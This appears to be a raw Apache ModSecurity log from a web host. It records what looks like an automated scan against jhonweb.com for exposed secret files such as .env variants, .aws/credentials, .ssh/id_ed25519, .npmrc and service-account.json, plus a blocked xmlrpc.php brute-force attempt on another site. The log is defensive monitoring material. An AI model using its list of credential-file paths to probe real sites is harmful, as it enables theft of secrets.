[Tue May 26 16:02:21.712085 2026] [security2:error] [pid 762634:tid 762797] [client 5.255.126.59:47634] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tbx8rj1VZMqUAOd4-gAAACE"]
[Tue May 26 16:02:22.375115 2026] [security2:error] [pid 762634:tid 762830] [client 5.255.126.59:47976] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2trx8rj1VZMqUAOd5DwAAAEI"], referer: https://jhonweb.com/config/secrets.yml
[Tue May 26 16:02:22.375217 2026] [security2:error] [pid 762634:tid 762800] [client 103.153.130.62:56477] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2trx8rj1VZMqUAOd5HgAAACQ"]
[Tue May 26 16:02:22.375335 2026] [security2:error] [pid 762634:tid 762800] [client 103.153.130.62:56477] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2trx8rj1VZMqUAOd5HgAAACQ"]
[Tue May 26 16:02:22.382218 2026] [security2:error] [pid 762634:tid 762881] [client 5.255.126.59:47982] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2trx8rj1VZMqUAOd5EAAAAHU"], referer: https://jhonweb.com/.env.production
[Tue May 26 16:02:22.430267 2026] [security2:error] [pid 762634:tid 762769] [client 5.255.126.59:48648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2trx8rj1VZMqUAOd5EQAAAAU"], referer: https://jhonweb.com/secrets/vault.json
[Tue May 26 16:02:22.668334 2026] [security2:error] [pid 762634:tid 762869] [client 5.255.126.59:48050] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2trx8rj1VZMqUAOd5IAAAAGk"], referer: https://jhonweb.com/.pypirc
[Tue May 26 16:02:22.675767 2026] [security2:error] [pid 762634:tid 762792] [client 5.255.126.59:48024] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2trx8rj1VZMqUAOd5HwAAABw"], referer: https://jhonweb.com/credentials.json
[Tue May 26 16:02:22.767813 2026] [security2:error] [pid 762634:tid 762877] [client 5.255.126.59:48010] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2trx8rj1VZMqUAOd5IQAAAHE"], referer: https://jhonweb.com/application.properties
[Tue May 26 16:02:22.773006 2026] [security2:error] [pid 762634:tid 762872] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2trx8rj1VZMqUAOd5GAAAAGw"]
[Tue May 26 16:02:22.807680 2026] [security2:error] [pid 762634:tid 762779] [client 5.255.126.59:48106] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2trx8rj1VZMqUAOd5JAAAAA8"], referer: https://jhonweb.com/.env.local
[Tue May 26 16:02:22.840275 2026] [security2:error] [pid 762634:tid 762833] [client 5.255.126.59:48084] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2trx8rj1VZMqUAOd5IwAAAEU"], referer: https://jhonweb.com/.env.staging
[Tue May 26 16:02:23.299272 2026] [security2:error] [pid 762634:tid 762851] [client 5.255.126.59:48224] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2trx8rj1VZMqUAOd5LwAAAFc"], referer: https://jhonweb.com/application.yml
[Tue May 26 16:02:23.325002 2026] [security2:error] [pid 762634:tid 762822] [client 5.255.126.59:48176] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2trx8rj1VZMqUAOd5MQAAADo"], referer: https://jhonweb.com/settings.py
[Tue May 26 16:02:23.326130 2026] [security2:error] [pid 762634:tid 762794] [client 5.255.126.59:48248] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2trx8rj1VZMqUAOd5MAAAAB4"], referer: https://jhonweb.com/.env.development
[Tue May 26 16:02:23.352587 2026] [security2:error] [pid 762634:tid 762840] [client 5.255.126.59:48648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2trx8rj1VZMqUAOd5NAAAAEw"], referer: https://jhonweb.com/.docker/config.json
[Tue May 26 16:02:23.370056 2026] [security2:error] [pid 762634:tid 762891] [client 5.255.126.59:48092] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2trx8rj1VZMqUAOd5NQAAAH8"], referer: https://jhonweb.com/google-credentials.json
[Tue May 26 16:02:23.834679 2026] [security2:error] [pid 762634:tid 762825] [client 5.255.126.59:48192] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2t7x8rj1VZMqUAOd5TQAAAD0"], referer: https://jhonweb.com/.env.example
[Tue May 26 16:02:24.035711 2026] [security2:error] [pid 762634:tid 762768] [client 5.255.126.59:48106] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2t7x8rj1VZMqUAOd5TgAAAAQ"], referer: https://jhonweb.com/service-account.json
[Tue May 26 16:02:24.052695 2026] [security2:error] [pid 762634:tid 762802] [client 5.255.126.59:48050] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2t7x8rj1VZMqUAOd5UAAAACY"], referer: https://jhonweb.com/vault/secrets/config
[Tue May 26 16:02:24.054936 2026] [security2:error] [pid 762634:tid 762860] [client 5.255.126.59:48266] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2t7x8rj1VZMqUAOd5TwAAAGA"], referer: https://jhonweb.com/sa.json
[Tue May 26 16:02:24.059304 2026] [security2:error] [pid 762634:tid 762808] [client 5.255.126.59:48024] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2t7x8rj1VZMqUAOd5UgAAACw"], referer: https://jhonweb.com/.ssh/id_ed25519
[Tue May 26 16:02:24.061827 2026] [security2:error] [pid 762634:tid 762796] [client 5.255.126.59:48084] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2t7x8rj1VZMqUAOd5UQAAACA"], referer: https://jhonweb.com/.npmrc
[Tue May 26 16:02:24.079687 2026] [security2:error] [pid 762634:tid 762834] [client 5.255.126.59:48010] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2t7x8rj1VZMqUAOd5UwAAAEY"], referer: https://jhonweb.com/keys/service-account.json
[Tue May 26 16:02:24.100916 2026] [security2:error] [pid 762634:tid 762890] [client 5.255.126.59:48224] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2t7x8rj1VZMqUAOd5VgAAAH4"], referer: https://jhonweb.com/gcp-credentials.json
[Tue May 26 16:02:24.307165 2026] [security2:error] [pid 762634:tid 762859] [client 5.255.126.59:48148] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2t7x8rj1VZMqUAOd5WgAAAF8"], referer: https://jhonweb.com/config.env
[Tue May 26 16:02:24.460840 2026] [security2:error] [pid 762634:tid 762805] [client 5.255.126.59:47976] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2uLx8rj1VZMqUAOd5XAAAACk"], referer: https://jhonweb.com/.aws/credentials
[Tue May 26 16:02:24.471192 2026] [security2:error] [pid 762634:tid 762801] [client 5.255.126.59:48248] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2uLx8rj1VZMqUAOd5XwAAACU"], referer: https://jhonweb.com/secrets.json
[Tue May 26 16:02:24.473452 2026] [security2:error] [pid 762634:tid 762854] [client 5.255.126.59:48092] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2uLx8rj1VZMqUAOd5YQAAAFo"], referer: https://jhonweb.com/config/application.properties
[Tue May 26 16:02:24.477862 2026] [security2:error] [pid 762634:tid 762818] [client 5.255.126.59:47982] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2uLx8rj1VZMqUAOd5XQAAADY"], referer: https://jhonweb.com/.vault.env
[Tue May 26 16:02:24.491421 2026] [security2:error] [pid 762634:tid 762771] [client 5.255.126.59:48176] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2uLx8rj1VZMqUAOd5YAAAAAc"], referer: https://jhonweb.com/secrets.yml
[Tue May 26 16:02:24.505887 2026] [security2:error] [pid 762634:tid 762817] [client 5.255.126.59:48648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2uLx8rj1VZMqUAOd5XgAAADU"], referer: https://jhonweb.com/admin/.env
[Tue May 26 16:02:25.356903 2026] [security2:error] [pid 762634:tid 762836] [client 5.255.126.59:47576] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5hwAAAEg"]
[Tue May 26 16:02:25.371726 2026] [security2:error] [pid 762634:tid 762891] [client 5.255.126.59:47798] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5ggAAAH8"]
[Tue May 26 16:02:25.383737 2026] [security2:error] [pid 762634:tid 762814] [client 5.255.126.59:47876] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5hAAAADI"]
[Tue May 26 16:02:25.402776 2026] [security2:error] [pid 762634:tid 762878] [client 5.255.126.59:48672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5kwAAAHI"]
[Tue May 26 16:02:25.417283 2026] [security2:error] [pid 762634:tid 762875] [client 5.255.126.59:47784] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5hgAAAG8"]
[Tue May 26 16:02:25.808468 2026] [security2:error] [pid 762634:tid 762871] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5oQAAAGs"]
[Tue May 26 16:02:26.273860 2026] [security2:error] [pid 762634:tid 762835] [client 5.255.126.59:47758] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5jAAAAEc"]
[Tue May 26 16:02:26.295458 2026] [security2:error] [pid 762634:tid 762838] [client 5.255.126.59:47702] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5lQAAAEo"]
[Tue May 26 16:02:26.305363 2026] [security2:error] [pid 762634:tid 762806] [client 5.255.126.59:47808] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5mQAAACo"]
[Tue May 26 16:02:26.317227 2026] [security2:error] [pid 762634:tid 762776] [client 5.255.126.59:47862] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5fwAAAAw"]
[Tue May 26 16:02:26.321684 2026] [security2:error] [pid 762634:tid 762841] [client 5.255.126.59:47910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5hQAAAE0"]
[Tue May 26 16:02:26.324166 2026] [security2:error] [pid 762634:tid 762873] [client 5.255.126.59:47934] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5iAAAAG0"]
[Tue May 26 16:02:26.334029 2026] [security2:error] [pid 762634:tid 762830] [client 5.255.126.59:47658] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5lgAAAEI"]
[Tue May 26 16:02:26.338133 2026] [security2:error] [pid 762634:tid 762843] [client 5.255.126.59:47536] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5fQAAAE8"]
[Tue May 26 16:02:26.342111 2026] [security2:error] [pid 762634:tid 762865] [client 5.255.126.59:47848] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5gQAAAGU"]
[Tue May 26 16:02:26.346514 2026] [security2:error] [pid 762634:tid 762861] [client 5.255.126.59:47898] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5kgAAAGE"]
[Tue May 26 16:02:26.349144 2026] [security2:error] [pid 762634:tid 762765] [client 5.255.126.59:47834] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5mAAAAAE"]
[Tue May 26 16:02:26.352594 2026] [security2:error] [pid 762634:tid 762787] [client 5.255.126.59:47634] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5gwAAABc"]
[Tue May 26 16:02:26.355150 2026] [security2:error] [pid 762634:tid 762811] [client 5.255.126.59:47828] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5kAAAAC8"]
[Tue May 26 16:02:26.371429 2026] [security2:error] [pid 762634:tid 762840] [client 5.255.126.59:47610] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5gAAAAEw"]
[Tue May 26 16:02:26.375866 2026] [security2:error] [pid 762634:tid 762863] [client 5.255.126.59:47824] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5iQAAAGM"]
[Tue May 26 16:02:26.376184 2026] [security2:error] [pid 762634:tid 762773] [client 5.255.126.59:47806] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5jgAAAAk"]
[Tue May 26 16:02:26.381062 2026] [security2:error] [pid 762634:tid 762816] [client 5.255.126.59:47524] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5jQAAADQ"]
[Tue May 26 16:02:26.397471 2026] [security2:error] [pid 762634:tid 762778] [client 5.255.126.59:47770] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5lwAAAA4"]
[Tue May 26 16:02:26.397909 2026] [security2:error] [pid 762634:tid 762868] [client 5.255.126.59:47556] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5iwAAAGg"]
[Tue May 26 16:02:26.399587 2026] [security2:error] [pid 762634:tid 762849] [client 5.255.126.59:47918] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5jwAAAFU"]
[Tue May 26 16:02:26.402340 2026] [security2:error] [pid 762634:tid 762825] [client 5.255.126.59:47592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5kQAAAD0"]
[Tue May 26 16:02:26.510142 2026] [security2:error] [pid 762634:tid 762796] [client 5.255.126.59:48192] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2ubx8rj1VZMqUAOd5rgAAACA"], referer: https://jhonweb.com/api/v2/settings
[Tue May 26 16:02:27.009672 2026] [security2:error] [pid 762634:tid 762795] [client 5.255.126.59:41670] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2urx8rj1VZMqUAOd5zQAAAB8"], referer: https://jhonweb.com/api/account
[Tue May 26 16:02:27.066664 2026] [security2:error] [pid 762634:tid 762842] [client 5.255.126.59:41692] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2urx8rj1VZMqUAOd50AAAAE4"], referer: https://jhonweb.com/.well-known/jwks.json
[Tue May 26 16:02:27.098670 2026] [security2:error] [pid 762634:tid 762888] [client 169.224.57.133:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV2u7x8rj1VZMqUAOd51wAAAHw"], referer: https://www.anujtradingco.com/
[Tue May 26 16:02:27.287333 2026] [security2:error] [pid 762634:tid 762858] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2urx8rj1VZMqUAOd50QAAAF4"]
[Tue May 26 16:02:27.326855 2026] [security2:error] [pid 762634:tid 762821] [client 5.255.126.59:48192] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2u7x8rj1VZMqUAOd52wAAADk"], referer: https://jhonweb.com/config.js
[Tue May 26 16:02:27.449935 2026] [security2:error] [pid 762634:tid 762884] [client 5.255.126.59:41682] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2u7x8rj1VZMqUAOd53wAAAHg"], referer: https://jhonweb.com/env.js
[Tue May 26 16:02:27.476663 2026] [security2:error] [pid 762634:tid 762872] [client 5.255.126.59:41664] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2u7x8rj1VZMqUAOd54AAAAGw"], referer: https://jhonweb.com/runtime-config.js
[Tue May 26 16:02:27.637073 2026] [security2:error] [pid 762634:tid 762818] [client 5.255.126.59:41670] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2u7x8rj1VZMqUAOd54gAAADY"], referer: https://jhonweb.com/api/config
[Tue May 26 16:02:27.715536 2026] [security2:error] [pid 762634:tid 762781] [client 5.255.126.59:41692] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2u7x8rj1VZMqUAOd56QAAABE"], referer: https://jhonweb.com/health
